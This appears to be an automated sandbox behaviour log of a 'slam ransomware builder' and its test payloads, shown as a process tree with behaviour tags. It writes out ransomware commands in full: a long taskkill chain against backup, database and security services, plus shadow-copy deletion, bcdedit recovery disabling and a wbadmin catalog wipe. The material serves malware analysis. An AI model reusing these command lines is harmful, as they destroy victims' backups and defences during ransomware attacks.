  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8ed6946f8,0x7ff8ed694708,0x7ff8ed694718
  2⤵
  PID:4768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5096 /prefetch:8
  2⤵
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:1208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
  2⤵
  PID:2416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6536 /prefetch:8
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
  2⤵
  PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6600 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7292 /prefetch:8
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:4468
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff68b6e5460,0x7ff68b6e5470,0x7ff68b6e5480
    3⤵
    PID:2600
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7292 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
  2⤵
  PID:5148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6172 /prefetch:8
  2⤵
  PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
  2⤵
  PID:5408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7516 /prefetch:8
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,12121693116311928045,5044362956448998347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8188 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5704

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4796

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5952

C:\Users\Admin\Downloads\slam ransomware builder installer.exe
"C:\Users\Admin\Downloads\slam ransomware builder installer.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\Desktop & del /Q /F slam_ransomware_builder.url & taskkill /F /IM slam.exe & exit
  2⤵
  PID:6140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM slam.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5172
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\Desktop & del /Q /F slam_ransomware_builder.url & exit
  2⤵
  PID:2600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start C:\slam_ransomware_builder\start.exe & exit
  2⤵
  PID:5308
- - C:\slam_ransomware_builder\start.exe
    C:\slam_ransomware_builder\start.exe
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    PID:5632
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CFD3.tmp\start.bat" C:\slam_ransomware_builder\start.exe"
      4⤵
      PID:5620
    - - C:\slam_ransomware_builder\slam.exe
        
        slam.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:3244
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln
        6⤵
        
        PID:2032
        
        C:\slam_ransomware_builder\MSBuild.exe
        
        MSBuild.exe ConsoleApp2\ConsoleApp2.sln
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:728
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmp467580e5049248b885ff8164387c1736.rsp"
        8⤵
        
        PID:4736
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA2C.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSCDCF600133EE2479CAEA8E3C90763F10.TMP"
        9⤵
        
        PID:4772
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config
        6⤵
        
        PID:2428
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config
        7⤵
        
        PID:2640
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE91.tmp" "c:\slam_ransomware_builder\CSC76D5D9A57EEC4619AC51DB4F589A6B4F.TMP"
        8⤵
        
        PID:3220
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln
        6⤵
        
        PID:4500
        
        C:\slam_ransomware_builder\MSBuild.exe
        
        MSBuild.exe ConsoleApp2\ConsoleApp2.sln
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmp6222f02ec8044de28de0304f4026fdeb.rsp"
        8⤵
        
        PID:5224
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF72C.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSCCD073D88C33146B68581D8F7387D41FC.TMP"
        9⤵
        
        PID:2264
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config
        6⤵
        
        PID:4660
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config
        7⤵
        
        PID:4168
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF940.tmp" "c:\slam_ransomware_builder\CSC2202632220404A0DAF9956875721E55D.TMP"
        8⤵
        
        PID:2784
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln
        6⤵
        
        PID:3228
        
        C:\slam_ransomware_builder\MSBuild.exe
        
        MSBuild.exe ConsoleApp2\ConsoleApp2.sln
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1628
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmp7adca710883a48e49f5f73ed62a2553b.rsp"
        8⤵
        
        PID:4928
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA54A.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSC6BD95D00320B4DAFA11E1B9197185DE4.TMP"
        9⤵
        
        PID:3952
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config
        6⤵
        
        PID:1836
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config
        7⤵
        
        PID:3480
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA73E.tmp" "c:\slam_ransomware_builder\CSCAF5D93D081B49618D5FFEBBDF5AF58D.TMP"
        8⤵
        
        PID:2264
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /F /IM server_connect.exe
        6⤵
        
        PID:4364
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM server_connect.exe
        7⤵
        Kills process with taskkill
        
        PID:4044

C:\slam_ransomware_builder\test.exe
"C:\slam_ransomware_builder\test.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4448
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentBrowser*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecDiveciMediaService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecJobEngine*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecManagementService*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM vss*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sql*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3240
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM svc$*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM memtas*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM backup*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxVss*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxBlr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4512
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxFWD*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCVD*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCIMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5544
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM DefWatch*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM SavRoam*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM RTVscan*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBFCService*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5536
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5300
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooBackup*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooIT*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5376
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM stc_raw_agent*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VSNAPVSS*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamTransportSvc*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamDeploymentService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamNFSSvc*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM PDVFSService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecVSSProvider*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentAccelerator*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:808
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecRPCService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcrSch2Svc*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcronisAgent*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CASAD2DWebSvc*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CAARCUpdateSvc*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM TeamViewer*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5492
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:216
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  PID:684
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5336

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1996

C:\slam_ransomware_builder\test1.exe
"C:\slam_ransomware_builder\test1.exe"
1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Drops desktop.ini file(s)
PID:2032
- C:\Windows\System32\cmd.exe
